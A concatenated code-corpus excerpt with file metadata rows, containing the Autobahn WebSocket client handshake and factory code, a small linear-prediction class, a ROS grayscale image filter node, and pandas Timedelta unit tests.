self.websocket_key3 = os.urandom(8)
accept_val = struct.pack(">II", number1, number2) + self.websocket_key3
self.websocket_expected_challenge_response = hashlib.md5(accept_val).digest()
## Safari does NOT set Content-Length, even though the body is
## non-empty and the request is unchunked. We set it explicitly.
## See also: http://www.ietf.org/mail-archive/web/hybi/current/msg02149.html
request += "Content-Length: %s\x0d\x0a" % len(self.websocket_key3)
## First two keys.
request += "Sec-WebSocket-Key1: %s\x0d\x0a" % self.websocket_key1
request += "Sec-WebSocket-Key2: %s\x0d\x0a" % self.websocket_key2
else:
self.websocket_key = base64.b64encode(os.urandom(16))
request += "Sec-WebSocket-Key: %s\x0d\x0a" % self.websocket_key
## optional origin announced
##
if self.factory.origin:
if self.version > 10 or self.version == 0:
request += "Origin: %s\x0d\x0a" % self.factory.origin.encode("utf-8")
else:
request += "Sec-WebSocket-Origin: %s\x0d\x0a" % self.factory.origin.encode("utf-8")
## optional list of WS subprotocols announced
##
if len(self.factory.protocols) > 0:
request += "Sec-WebSocket-Protocol: %s\x0d\x0a" % ','.join(self.factory.protocols)
## set WS protocol version depending on WS spec version
##
if self.version != 0:
request += "Sec-WebSocket-Version: %d\x0d\x0a" % WebSocketProtocol.SPEC_TO_PROTOCOL_VERSION[self.version]
request += "\x0d\x0a"
if self.version == 0:
## Write HTTP request body for Hixie-76
request += self.websocket_key3
self.http_request_data = request
if self.debug:
log.msg(self.http_request_data)
self.sendData(self.http_request_data)
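## For illustration only (editorial addition; host, path and subprotocol are
## example values): for a post-Hixie client (self.version != 0) the request
## assembled above looks roughly like
##
## GET /chat HTTP/1.1
## User-Agent: AutobahnPython/x.x.x
## Host: localhost:9000
## Upgrade: WebSocket
## Connection: Upgrade
## Pragma: no-cache
## Cache-Control: no-cache
## Sec-WebSocket-Key: <16 random bytes, base64-encoded>
## Sec-WebSocket-Protocol: chat (only if subprotocols were announced)
## Sec-WebSocket-Version: 13
##
## with an Origin header inserted before the subprotocol line when
## self.factory.origin is set.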
def processHandshake(self):
"""
Process WebSocket opening handshake response from server.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
self.http_response_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP response:\n\n%s\n\n" % self.http_response_data)
## extract HTTP status line and headers
##
(self.http_status_line, self.http_headers, http_headers_cnt) = parseHttpHeader(self.http_response_data)
## validate WebSocket opening handshake server response
##
if self.debug:
log.msg("received HTTP status line in opening handshake : %s" % str(self.http_status_line))
log.msg("received HTTP headers in opening handshake : %s" % str(self.http_headers))
## Response Line
##
sl = self.http_status_line.split()
if len(sl) < 2:
return self.failHandshake("Bad HTTP response status line '%s'" % self.http_status_line)
## HTTP version
##
http_version = sl[0].strip()
if http_version != "HTTP/1.1":
return self.failHandshake("Unsupported HTTP version ('%s')" % http_version)
## HTTP status code
##
try:
status_code = int(sl[1].strip())
except:
return self.failHandshake("Bad HTTP status code ('%s')" % sl[1].strip())
if status_code != HTTP_STATUS_CODE_SWITCHING_PROTOCOLS[0]:
## FIXME: handle redirects
## FIXME: handle authentication required
if len(sl) > 2:
reason = " - %s" % ''.join(sl[2:])
else:
reason = ""
return self.failHandshake("WebSocket connection upgrade failed (%d%s)" % (status_code, reason))
## Upgrade
##
if not self.http_headers.has_key("upgrade"):
return self.failHandshake("HTTP Upgrade header missing")
if self.http_headers["upgrade"].strip().lower() != "websocket":
return self.failHandshake("HTTP Upgrade header different from 'websocket' (case-insensitive) : %s" % self.http_headers["upgrade"])
## Connection
##
if not self.http_headers.has_key("connection"):
return self.failHandshake("HTTP Connection header missing")
connectionUpgrade = False
for c in self.http_headers["connection"].split(","):
if c.strip().lower() == "upgrade":
connectionUpgrade = True
break
if not connectionUpgrade:
return self.failHandshake("HTTP Connection header does not include 'upgrade' value (case-insensitive) : %s" % self.http_headers["connection"])
## compute Sec-WebSocket-Accept
##
if self.version != 0:
if not self.http_headers.has_key("sec-websocket-accept"):
return self.failHandshake("HTTP Sec-WebSocket-Accept header missing in opening handshake reply")
else:
if http_headers_cnt["sec-websocket-accept"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Accept header appears more than once in opening handshake reply")
sec_websocket_accept_got = self.http_headers["sec-websocket-accept"].strip()
sha1 = hashlib.sha1()
sha1.update(self.websocket_key + WebSocketProtocol._WS_MAGIC)
sec_websocket_accept = base64.b64encode(sha1.digest())
if sec_websocket_accept_got != sec_websocket_accept:
return self.failHandshake("HTTP Sec-WebSocket-Accept bogus value : expected %s / got %s" % (sec_websocket_accept, sec_websocket_accept_got))
## handle "extensions in use" - if any
##
self.websocket_extensions_in_use = []
if self.version != 0:
if self.http_headers.has_key("sec-websocket-extensions"):
if http_headers_cnt["sec-websocket-extensions"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Extensions header appears more than once in opening handshake reply")
exts = self.http_headers["sec-websocket-extensions"].strip()
##
## we don't support any extensions, but if we did, we would need
## to set self.websocket_extensions_in_use here and not fail the handshake
##
return self.failHandshake("server wants to use extensions (%s), but no extensions implemented" % exts)
## handle "subprotocol in use" - if any
##
self.websocket_protocol_in_use = None
if self.http_headers.has_key("sec-websocket-protocol"):
if http_headers_cnt["sec-websocket-protocol"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Protocol header appears more than once in opening handshake reply")
sp = str(self.http_headers["sec-websocket-protocol"].strip())
if sp != "":
if sp not in self.factory.protocols:
return self.failHandshake("subprotocol selected by server (%s) not in subprotocol list requested by client (%s)" % (sp, str(self.factory.protocols)))
else:
## ok, subprotocol in use
##
self.websocket_protocol_in_use = sp
## For Hixie-76, we need 16 octets of HTTP request body to complete HS!
##
if self.version == 0:
if len(self.data) < end_of_header + 4 + 16:
return
else:
challenge_response = self.data[end_of_header + 4:end_of_header + 4 + 16]
if challenge_response != self.websocket_expected_challenge_response:
return self.failHandshake("invalid challenge response received from server (Hixie-76)")
## Ok, got complete HS input, remember rest (if any)
##
if self.version == 0:
self.data = self.data[end_of_header + 4 + 16:]
else:
self.data = self.data[end_of_header + 4:]
## opening handshake completed, move WebSocket connection into OPEN state
##
self.state = WebSocketProtocol.STATE_OPEN
self.inside_message = False
if self.version != 0:
self.current_frame = None
self.websocket_version = self.version
## we handle this symmetrically to the server-side .. that is, give the
## client a chance to bail out .. i.e. on no subprotocol selected
## by server
try:
connectionResponse = ConnectionResponse(self.peer,
self.peerstr,
self.http_headers,
None, # FIXME
self.websocket_protocol_in_use,
self.websocket_extensions_in_use)
self.onConnect(connectionResponse)
except Exception, e:
## immediately close the WS connection
##
self.failConnection(1000, str(e))
else:
## fire handler on derived class
##
if self.trackedTimings:
self.trackedTimings.track("onOpen")
self.onOpen()
## process rest, if any
##
if len(self.data) > 0:
self.consumeData()
def failHandshake(self, reason):
"""
During opening handshake the server response is invalid and we drop the
connection.
"""
if self.debug:
log.msg("failing WebSocket opening handshake ('%s')" % reason)
self.dropConnection(abort = True)
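## Illustrative usage (editorial addition, not part of the original module):
## applications normally subclass WebSocketClientProtocol and override the
## callbacks; the echo client below is a placeholder sketch using the 0.x-era
## callback signatures:
##
## class EchoClientProtocol(WebSocketClientProtocol):
##
## def onOpen(self):
## self.sendMessage("Hello, world!")
##
## def onMessage(self, msg, binary):
## print "got echo: %s" % msg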
class WebSocketClientFactory(protocol.ClientFactory, WebSocketFactory):
"""
A Twisted factory for WebSocket client protocols.
"""
protocol = WebSocketClientProtocol
"""
The protocol to be spoken. Must be derived from :class:`autobahn.websocket.WebSocketClientProtocol`.
"""
def __init__(self, url = None, origin = None, protocols = [], useragent = "AutobahnPython/%s" % __version__, headers = {}, proxy = None, debug = False, debugCodePaths = False):
"""
Create instance of WebSocket client factory.
Note that you MUST provide URL either here or set using
:meth:`autobahn.websocket.WebSocketClientFactory.setSessionParameters`
*before* the factory is started.
:param url: WebSocket URL to connect to - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param origin: The origin to be sent in WebSocket opening handshake or None (default: None).
:type origin: str
:param protocols: List of subprotocols the client should announce in WebSocket opening handshake (default: []).
:type protocols: list of strings
:param useragent: User agent as announced in HTTP request header or None (default: "AutobahnPython/x.x.x").
:type useragent: str
:param headers: An optional mapping of additional HTTP headers to send during the WebSocket opening handshake.
:type headers: dict
:param proxy: Explicit proxy server to use (hostname:port or IP:port), e.g. "192.168.1.100:8080".
:type proxy: str
:param debug: Debug mode (default: False).
:type debug: bool
:param debugCodePaths: Debug code paths mode (default: False).
:type debugCodePaths: bool
"""
self.debug = debug
self.debugCodePaths = debugCodePaths
self.logOctets = debug
self.logFrames = debug
self.trackTimings = False
self.isServer = False
## seed RNG which is used for WS opening handshake key and WS frame masks generation
random.seed()
## default WS session parameters
##
self.setSessionParameters(url, origin, protocols, useragent, headers, proxy)
## default WebSocket protocol options
##
self.resetProtocolOptions()
def setSessionParameters(self, url = None, origin = None, protocols = [], useragent = None, headers = {}, proxy = None):
"""
Set WebSocket session parameters.
:param url: WebSocket URL to connect to - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param origin: The origin to be sent in opening handshake.
:type origin: str
:param protocols: List of WebSocket subprotocols the client should announce in opening handshake.
:type protocols: list of strings
:param useragent: User agent as announced in HTTP request header during opening handshake.
:type useragent: str
:param headers: An optional mapping of additional HTTP headers to send during the WebSocket opening handshake.
:type headers: dict
"""
if url is not None:
## parse WebSocket URI into components
(isSecure, host, port, resource, path, params) = parseWsUrl(url)
self.url = url
self.isSecure = isSecure
self.host = host
self.port = port
self.resource = resource
self.path = path
self.params = params
else:
self.url = None
self.isSecure = None
self.host = None
self.port = None
self.resource = None
self.path = None
self.params = None
self.origin = origin
self.protocols = protocols
self.useragent = useragent
self.headers = headers
self.proxy = proxy
def resetProtocolOptions(self):
"""
Reset all WebSocket protocol options to defaults.
"""
self.version = WebSocketProtocol.DEFAULT_SPEC_VERSION
self.allowHixie76 = WebSocketProtocol.DEFAULT_ALLOW_HIXIE76
self.utf8validateIncoming = True
self.acceptMaskedServerFrames = False
self.maskClientFrames = True
self.applyMask = True
self.maxFramePayloadSize = 0
self.maxMessagePayloadSize = 0
self.autoFragmentSize = 0
self.failByDrop = True
self.echoCloseCodeReason = False
self.serverConnectionDropTimeout = 1
self.openHandshakeTimeout = 5
self.closeHandshakeTimeout = 1
self.tcpNoDelay = True
def setProtocolOptions(self,
version = None,
allowHixie76 = None,
utf8validateIncoming = None,
acceptMaskedServerFrames = None,
maskClientFrames = None,
applyMask = None,
maxFramePayloadSize = None,
maxMessagePayloadSize = None,
autoFragmentSize = None,
failByDrop = None,
echoCloseCodeReason = None,
serverConnectionDropTimeout = None,
openHandshakeTimeout = None,
closeHandshakeTimeout = None,
tcpNoDelay = None):
"""
Set WebSocket protocol options used as defaults for _new_ protocol instances.
:param version: The WebSocket protocol spec (draft) version to be used (default: WebSocketProtocol.DEFAULT_SPEC_VERSION).
:type version: int
:param allowHixie76: Allow to speak Hixie76 protocol version.
:type allowHixie76: bool
:param utf8validateIncoming: Validate incoming UTF-8 in text message payloads (default: True).
:type utf8validateIncoming: bool
:param acceptMaskedServerFrames: Accept masked server-to-client frames (default: False).
:type acceptMaskedServerFrames: bool
:param maskClientFrames: Mask client-to-server frames (default: True).
:type maskClientFrames: bool
:param applyMask: Actually apply mask to payload when a mask is present. Applies to outgoing and incoming frames (default: True).
:type applyMask: bool
:param maxFramePayloadSize: Maximum frame payload size that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxFramePayloadSize: int
:param maxMessagePayloadSize: Maximum message payload size (after reassembly of fragmented messages) that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxMessagePayloadSize: int
:param autoFragmentSize: Automatic fragmentation of outgoing data messages (when using the message-based API) into frames with payload length <= this size or 0 for no auto-fragmentation (default: 0).
:type autoFragmentSize: int
:param failByDrop: Fail connections by dropping the TCP connection without performing closing handshake (default: True).
:type failByDrop: bool
:param echoCloseCodeReason: Iff true, when receiving a close, echo back close code/reason. Otherwise reply with code == NORMAL, reason = "" (default: False).
:type echoCloseCodeReason: bool
:param serverConnectionDropTimeout: When the client expects the server to drop the TCP, timeout in seconds (default: 1).
:type serverConnectionDropTimeout: float
:param openHandshakeTimeout: Opening WebSocket handshake timeout, timeout in seconds or 0 to deactivate (default: 5).
:type openHandshakeTimeout: float
:param closeHandshakeTimeout: When we expect to receive a closing handshake reply, timeout in seconds (default: 1).
:type closeHandshakeTimeout: float
:param tcpNoDelay: TCP NODELAY ("Nagle") socket option (default: True).
:type tcpNoDelay: bool
"""
if allowHixie76 is not None and allowHixie76 != self.allowHixie76:
self.allowHixie76 = allowHixie76
if version is not None:
if version not in WebSocketProtocol.SUPPORTED_SPEC_VERSIONS:
raise Exception("invalid WebSocket draft version %s (allowed values: %s)" % (version, str(WebSocketProtocol.SUPPORTED_SPEC_VERSIONS)))
if version == 0 and not self.allowHixie76:
raise Exception("use of Hixie-76 requires allowHixie76 == True")
if version != self.version:
self.version = version
if utf8validateIncoming is not None and utf8validateIncoming != self.utf8validateIncoming:
self.utf8validateIncoming = utf8validateIncoming
if acceptMaskedServerFrames is not None and acceptMaskedServerFrames != self.acceptMaskedServerFrames:
self.acceptMaskedServerFrames = acceptMaskedServerFrames
if maskClientFrames is not None and maskClientFrames != self.maskClientFrames:
self.maskClientFrames = maskClientFrames
if applyMask is not None and applyMask != self.applyMask:
self.applyMask = applyMask
if maxFramePayloadSize is not None and maxFramePayloadSize != self.maxFramePayloadSize:
self.maxFramePayloadSize = maxFramePayloadSize
if maxMessagePayloadSize is not None and maxMessagePayloadSize != self.maxMessagePayloadSize:
self.maxMessagePayloadSize = maxMessagePayloadSize
if autoFragmentSize is not None and autoFragmentSize != self.autoFragmentSize:
self.autoFragmentSize = autoFragmentSize
if failByDrop is not None and failByDrop != self.failByDrop:
self.failByDrop = failByDrop
if echoCloseCodeReason is not None and echoCloseCodeReason != self.echoCloseCodeReason:
self.echoCloseCodeReason = echoCloseCodeReason
if serverConnectionDropTimeout is not None and serverConnectionDropTimeout != self.serverConnectionDropTimeout:
self.serverConnectionDropTimeout = serverConnectionDropTimeout
if openHandshakeTimeout is not None and openHandshakeTimeout != self.openHandshakeTimeout:
self.openHandshakeTimeout = openHandshakeTimeout
if closeHandshakeTimeout is not None and closeHandshakeTimeout != self.closeHandshakeTimeout:
self.closeHandshakeTimeout = closeHandshakeTimeout
if tcpNoDelay is not None and tcpNoDelay != self.tcpNoDelay:
self.tcpNoDelay = tcpNoDelay
def clientConnectionFailed(self, connector, reason):
"""
Called by Twisted when the connection to server has failed. Default implementation
does nothing. Override in derived class when appropriate.
"""
pass
def clientConnectionLost(self, connector, reason):
"""
Called by Twisted when the connection to server was lost. Default implementation
does nothing. Override in derived class when appropriate.
"""
pass
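## Illustrative usage (editorial addition, not part of the original file):
## a client factory is typically wired up through the Twisted reactor; the
## URL and protocol class below are placeholders:
##
## from twisted.internet import reactor
## factory = WebSocketClientFactory("ws://localhost:9000", debug = False)
## factory.protocol = EchoClientProtocol # a WebSocketClientProtocol subclass
## reactor.connectTCP(factory.host, factory.port, factory)
## reactor.run()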
| gpl-3.0 | 8,117,406,587,043,622,000 | 37.000746 | 214 | 0.601589 | false |
Calvinxc1/Data_Analytics | old versions/analysis_classes/Cluster_Control/Cluster_IO/Predict_Cluster/predictor.py | 1 | 1655 | #%% Libraries
import numpy as np
import root_funcs as rf
#%% predict_linear class (Module for Process_Node - Predict)
class predict_linear(object):
__lookup_dict = {
'beta_init': {
'zeros': ('Cluster_Control.Cluster_IO.Predict_Cluster.beta_init', 'beta_zeros')
},
'learn_rate': {
'partial_hessian': ('Cluster_Control.Cluster_IO.Predict_Cluster.Linear.learn_rate', 'partial_hessian'),
'manual': ('Cluster_Control.Cluster_IO.Predict_Cluster.Linear.learn_rate', 'manual')
}
}
__class_type = 'predict_linear'
def __init__(self, beta_init_type = 'zeros', learn_rate_type = 'partial_hessian'):
self.__betas = np.empty((0, 0))
self.__subclasses = {}
self.set_subclass('beta_init', beta_init_type)
self.set_subclass('learn_rate', learn_rate_type)
def get_type(self):
return self.__class_type
def set_subclass(self, subitem, subitem_type, *args, **kwargs):
self.__subclasses[subitem] = (subitem_type, rf.upload_module(self.__lookup_dict[subitem][subitem_type])(*args, **kwargs))
def call_submethod(self, subitem, submethod, *args, **kwargs):
return getattr(self.__subclasses[subitem][1], submethod)(*args, **kwargs)
def get_subclass_type(self, subitem):
return self.__subclasses.get(subitem, (None))[0]
def init_betas(self, feature_count):
self.__betas = self.call_submethod('beta_init', 'initialize', feature_count)
def predict(self, input_data):
return np.dot(input_data, self.__betas)
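#%% Illustrative usage (editorial addition, not part of the original file).
# Assumes the submodules referenced in __lookup_dict are importable via
# root_funcs and that input_data is a 2-D numpy array whose column count
# matches feature_count:
#
# model = predict_linear(beta_init_type = 'zeros', learn_rate_type = 'manual')
# model.init_betas(feature_count = 4)
# predictions = model.predict(input_data)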
| gpl-3.0 | 1,337,883,345,496,032,800 | 35.8 | 129 | 0.598187 | false |
OSUrobotics/privacy-interfaces | filtering/text_filters/scripts/try_something_new.py | 1 | 1266 | #!/usr/bin/env python
import rospy
from cv_bridge import CvBridge
import cv, cv2
import numpy
from sensor_msgs.msg import Image
bridge = CvBridge()
pub = rospy.Publisher("/image_out", Image)
def image_callback(image):
""" Applies a new filter to the image and displays the result. """
image_cv = bridge.imgmsg_to_cv(image)
image_cv2 = numpy.asarray(image_cv)
# Downsample the grayscale image
gray = image_cv2[:, :, 0]/3 + image_cv2[:, :, 1]/3 + image_cv2[:, :, 2]/3
gray = cv2.pyrDown(gray)
#gray = cv2.pyrDown(gray)
#gray = cv2.pyrDown(gray)
# Make new 3-channel image
image_new = numpy.zeros((gray.shape[0], gray.shape[1], image_cv2.shape[2]))
image_new[:, :, 0] = image_new[:, :, 1] = image_new[:, :, 2] = gray
image_new = image_new.astype('uint8')
print image_new.shape
# Re-publish
image.data = bridge.cv_to_imgmsg(cv.fromarray(image_new),
encoding=image.encoding).data
image.width = image_new.shape[1]
image.height = image_new.shape[0]
image.step = image.width * 3
pub.publish(image)
if __name__ == "__main__":
rospy.init_node("new_filter")
rospy.Subscriber("/camera/rgb/image_color", Image, image_callback)
rospy.spin()
| mit | -8,800,374,811,631,611,000 | 29.142857 | 79 | 0.621643 | false |
zfrenchee/pandas | pandas/tests/scalar/test_timedelta.py | 1 | 33010 | """ test the scalar Timedelta """
import pytest
import numpy as np
from datetime import timedelta
import pandas as pd
import pandas.util.testing as tm
from pandas.core.tools.timedeltas import _coerce_scalar_to_timedelta_type as ct
from pandas import (Timedelta, TimedeltaIndex, timedelta_range, Series,
to_timedelta, compat)
from pandas._libs.tslib import iNaT, NaT
class TestTimedeltaArithmetic(object):
_multiprocess_can_split_ = True
def test_arithmetic_overflow(self):
with pytest.raises(OverflowError):
pd.Timestamp('1700-01-01') + pd.Timedelta(13 * 19999, unit='D')
with pytest.raises(OverflowError):
pd.Timestamp('1700-01-01') + timedelta(days=13 * 19999)
def test_ops_error_str(self):
# GH 13624
td = Timedelta('1 day')
for left, right in [(td, 'a'), ('a', td)]:
with pytest.raises(TypeError):
left + right
with pytest.raises(TypeError):
left > right
assert not left == right
assert left != right
def test_to_timedelta_on_nanoseconds(self):
# GH 9273
result = Timedelta(nanoseconds=100)
expected = Timedelta('100ns')
assert result == expected
result = Timedelta(days=1, hours=1, minutes=1, weeks=1, seconds=1,
milliseconds=1, microseconds=1, nanoseconds=1)
expected = Timedelta(694861001001001)
assert result == expected
result = Timedelta(microseconds=1) + Timedelta(nanoseconds=1)
expected = Timedelta('1us1ns')
assert result == expected
result = Timedelta(microseconds=1) - Timedelta(nanoseconds=1)
expected = Timedelta('999ns')
assert result == expected
result = Timedelta(microseconds=1) + 5 * Timedelta(nanoseconds=-2)
expected = Timedelta('990ns')
assert result == expected
pytest.raises(TypeError, lambda: Timedelta(nanoseconds='abc'))
def test_ops_notimplemented(self):
class Other:
pass
other = Other()
td = Timedelta('1 day')
assert td.__add__(other) is NotImplemented
assert td.__sub__(other) is NotImplemented
assert td.__truediv__(other) is NotImplemented
assert td.__mul__(other) is NotImplemented
assert td.__floordiv__(other) is NotImplemented
def test_timedelta_ops_scalar(self):
# GH 6808
base = pd.to_datetime('20130101 09:01:12.123456')
expected_add = pd.to_datetime('20130101 09:01:22.123456')
expected_sub = pd.to_datetime('20130101 09:01:02.123456')
for offset in [pd.to_timedelta(10, unit='s'), timedelta(seconds=10),
np.timedelta64(10, 's'),
np.timedelta64(10000000000, 'ns'),
pd.offsets.Second(10)]:
result = base + offset
assert result == expected_add
result = base - offset
assert result == expected_sub
base = pd.to_datetime('20130102 09:01:12.123456')
expected_add = pd.to_datetime('20130103 09:01:22.123456')
expected_sub = pd.to_datetime('20130101 09:01:02.123456')
for offset in [pd.to_timedelta('1 day, 00:00:10'),
pd.to_timedelta('1 days, 00:00:10'),
timedelta(days=1, seconds=10),
np.timedelta64(1, 'D') + np.timedelta64(10, 's'),
pd.offsets.Day() + pd.offsets.Second(10)]:
result = base + offset
assert result == expected_add
result = base - offset
assert result == expected_sub
def test_ops_offsets(self):
td = Timedelta(10, unit='d')
assert Timedelta(241, unit='h') == td + pd.offsets.Hour(1)
assert Timedelta(241, unit='h') == pd.offsets.Hour(1) + td
assert 240 == td / pd.offsets.Hour(1)
assert 1 / 240.0 == pd.offsets.Hour(1) / td
assert Timedelta(239, unit='h') == td - pd.offsets.Hour(1)
assert Timedelta(-239, unit='h') == pd.offsets.Hour(1) - td
def test_unary_ops(self):
td = Timedelta(10, unit='d')
# __neg__, __pos__
assert -td == Timedelta(-10, unit='d')
assert -td == Timedelta('-10d')
assert +td == Timedelta(10, unit='d')
# __abs__, __abs__(__neg__)
assert abs(td) == td
assert abs(-td) == td
assert abs(-td) == Timedelta('10d')
def test_binary_ops_nat(self):
td = Timedelta(10, unit='d')
assert (td - pd.NaT) is pd.NaT
assert (td + pd.NaT) is pd.NaT
assert (td * pd.NaT) is pd.NaT
assert (td / pd.NaT) is np.nan
assert (td // pd.NaT) is np.nan
def test_binary_ops_integers(self):
td = Timedelta(10, unit='d')
assert td * 2 == Timedelta(20, unit='d')
assert td / 2 == Timedelta(5, unit='d')
assert td // 2 == Timedelta(5, unit='d')
# invert
assert td * -1 == Timedelta('-10d')
assert -1 * td == Timedelta('-10d')
# can't operate with integers
pytest.raises(TypeError, lambda: td + 2)
pytest.raises(TypeError, lambda: td - 2)
def test_binary_ops_with_timedelta(self):
td = Timedelta(10, unit='d')
assert td - td == Timedelta(0, unit='ns')
assert td + td == Timedelta(20, unit='d')
assert td / td == 1
# invalid multiply with another timedelta
pytest.raises(TypeError, lambda: td * td)
class TestTimedeltaComparison(object):
def test_comparison_object_array(self):
# analogous to GH#15183
td = Timedelta('2 days')
other = Timedelta('3 hours')
arr = np.array([other, td], dtype=object)
res = arr == td
expected = np.array([False, True], dtype=bool)
assert (res == expected).all()
# 2D case
arr = np.array([[other, td],
[td, other]],
dtype=object)
res = arr != td
expected = np.array([[True, False], [False, True]], dtype=bool)
assert res.shape == expected.shape
assert (res == expected).all()
class TestTimedeltas(object):
_multiprocess_can_split_ = True
def setup_method(self, method):
pass
def test_construction(self):
expected = np.timedelta64(10, 'D').astype('m8[ns]').view('i8')
assert Timedelta(10, unit='d').value == expected
assert Timedelta(10.0, unit='d').value == expected
assert Timedelta('10 days').value == expected
assert Timedelta(days=10).value == expected
assert Timedelta(days=10.0).value == expected
expected += np.timedelta64(10, 's').astype('m8[ns]').view('i8')
assert Timedelta('10 days 00:00:10').value == expected
assert Timedelta(days=10, seconds=10).value == expected
assert Timedelta(days=10, milliseconds=10 * 1000).value == expected
assert (Timedelta(days=10, microseconds=10 * 1000 * 1000)
.value == expected)
# gh-8757: test construction with np dtypes
timedelta_kwargs = {'days': 'D',
'seconds': 's',
'microseconds': 'us',
'milliseconds': 'ms',
'minutes': 'm',
'hours': 'h',
'weeks': 'W'}
npdtypes = [np.int64, np.int32, np.int16, np.float64, np.float32,
np.float16]
for npdtype in npdtypes:
for pykwarg, npkwarg in timedelta_kwargs.items():
expected = np.timedelta64(1, npkwarg).astype(
'm8[ns]').view('i8')
assert Timedelta(**{pykwarg: npdtype(1)}).value == expected
# rounding cases
assert Timedelta(82739999850000).value == 82739999850000
assert ('0 days 22:58:59.999850' in str(Timedelta(82739999850000)))
assert Timedelta(123072001000000).value == 123072001000000
assert ('1 days 10:11:12.001' in str(Timedelta(123072001000000)))
# string conversion with/without leading zero
# GH 9570
assert Timedelta('0:00:00') == timedelta(hours=0)
assert Timedelta('00:00:00') == timedelta(hours=0)
assert Timedelta('-1:00:00') == -timedelta(hours=1)
assert Timedelta('-01:00:00') == -timedelta(hours=1)
# more strings & abbrevs
# GH 8190
assert Timedelta('1 h') == timedelta(hours=1)
assert Timedelta('1 hour') == timedelta(hours=1)
assert Timedelta('1 hr') == timedelta(hours=1)
assert Timedelta('1 hours') == timedelta(hours=1)
assert Timedelta('-1 hours') == -timedelta(hours=1)
assert Timedelta('1 m') == timedelta(minutes=1)
assert Timedelta('1.5 m') == timedelta(seconds=90)
assert Timedelta('1 minute') == timedelta(minutes=1)
assert Timedelta('1 minutes') == timedelta(minutes=1)
assert Timedelta('1 s') == timedelta(seconds=1)
assert Timedelta('1 second') == timedelta(seconds=1)
assert Timedelta('1 seconds') == timedelta(seconds=1)
assert Timedelta('1 ms') == timedelta(milliseconds=1)
assert Timedelta('1 milli') == timedelta(milliseconds=1)
assert Timedelta('1 millisecond') == timedelta(milliseconds=1)
assert Timedelta('1 us') == timedelta(microseconds=1)
assert Timedelta('1 micros') == timedelta(microseconds=1)
assert Timedelta('1 microsecond') == timedelta(microseconds=1)
assert Timedelta('1.5 microsecond') == Timedelta('00:00:00.000001500')
assert Timedelta('1 ns') == Timedelta('00:00:00.000000001')
assert Timedelta('1 nano') == Timedelta('00:00:00.000000001')
assert Timedelta('1 nanosecond') == Timedelta('00:00:00.000000001')
# combos
assert Timedelta('10 days 1 hour') == timedelta(days=10, hours=1)
assert Timedelta('10 days 1 h') == timedelta(days=10, hours=1)
assert Timedelta('10 days 1 h 1m 1s') == timedelta(
days=10, hours=1, minutes=1, seconds=1)
assert Timedelta('-10 days 1 h 1m 1s') == -timedelta(
days=10, hours=1, minutes=1, seconds=1)
assert Timedelta('-10 days 1 h 1m 1s') == -timedelta(
days=10, hours=1, minutes=1, seconds=1)
assert Timedelta('-10 days 1 h 1m 1s 3us') == -timedelta(
days=10, hours=1, minutes=1, seconds=1, microseconds=3)
assert Timedelta('-10 days 1 h 1.5m 1s 3us') == -timedelta(
days=10, hours=1, minutes=1, seconds=31, microseconds=3)
# Currently invalid as it has a - on the hh:mm:dd part
# (only allowed on the days)
pytest.raises(ValueError,
lambda: Timedelta('-10 days -1 h 1.5m 1s 3us'))
# only leading neg signs are allowed
pytest.raises(ValueError,
lambda: Timedelta('10 days -1 h 1.5m 1s 3us'))
# no units specified
pytest.raises(ValueError, lambda: Timedelta('3.1415'))
# invalid construction
tm.assert_raises_regex(ValueError, "cannot construct a Timedelta",
lambda: Timedelta())
tm.assert_raises_regex(ValueError,
"unit abbreviation w/o a number",
lambda: Timedelta('foo'))
tm.assert_raises_regex(ValueError,
"cannot construct a Timedelta from the "
"passed arguments, allowed keywords are ",
lambda: Timedelta(day=10))
# round-trip both for string and value
for v in ['1s', '-1s', '1us', '-1us', '1 day', '-1 day',
'-23:59:59.999999', '-1 days +23:59:59.999999', '-1ns',
'1ns', '-23:59:59.999999999']:
td = Timedelta(v)
assert Timedelta(td.value) == td
# str does not normally display nanos
if not td.nanoseconds:
assert Timedelta(str(td)) == td
assert Timedelta(td._repr_base(format='all')) == td
# floats
expected = np.timedelta64(
10, 's').astype('m8[ns]').view('i8') + np.timedelta64(
500, 'ms').astype('m8[ns]').view('i8')
assert Timedelta(10.5, unit='s').value == expected
# offset
assert (to_timedelta(pd.offsets.Hour(2)) ==
Timedelta('0 days, 02:00:00'))
assert (Timedelta(pd.offsets.Hour(2)) ==
Timedelta('0 days, 02:00:00'))
assert (Timedelta(pd.offsets.Second(2)) ==
Timedelta('0 days, 00:00:02'))
# gh-11995: unicode
expected = Timedelta('1H')
result = pd.Timedelta(u'1H')
assert result == expected
assert (to_timedelta(pd.offsets.Hour(2)) ==
Timedelta(u'0 days, 02:00:00'))
pytest.raises(ValueError, lambda: Timedelta(u'foo bar'))
def test_overflow_on_construction(self):
# xref https://github.com/statsmodels/statsmodels/issues/3374
value = pd.Timedelta('1day').value * 20169940
pytest.raises(OverflowError, pd.Timedelta, value)
# xref gh-17637
with pytest.raises(OverflowError):
pd.Timedelta(7 * 19999, unit='D')
with pytest.raises(OverflowError):
pd.Timedelta(timedelta(days=13 * 19999))
def test_total_seconds_scalar(self):
# see gh-10939
rng = Timedelta('1 days, 10:11:12.100123456')
expt = 1 * 86400 + 10 * 3600 + 11 * 60 + 12 + 100123456. / 1e9
tm.assert_almost_equal(rng.total_seconds(), expt)
rng = Timedelta(np.nan)
assert np.isnan(rng.total_seconds())
def test_repr(self):
assert (repr(Timedelta(10, unit='d')) ==
"Timedelta('10 days 00:00:00')")
assert (repr(Timedelta(10, unit='s')) ==
"Timedelta('0 days 00:00:10')")
assert (repr(Timedelta(10, unit='ms')) ==
"Timedelta('0 days 00:00:00.010000')")
assert (repr(Timedelta(-10, unit='ms')) ==
"Timedelta('-1 days +23:59:59.990000')")
def test_conversion(self):
for td in [Timedelta(10, unit='d'),
Timedelta('1 days, 10:11:12.012345')]:
pydt = td.to_pytimedelta()
assert td == Timedelta(pydt)
assert td == pydt
assert (isinstance(pydt, timedelta) and not isinstance(
pydt, Timedelta))
assert td == np.timedelta64(td.value, 'ns')
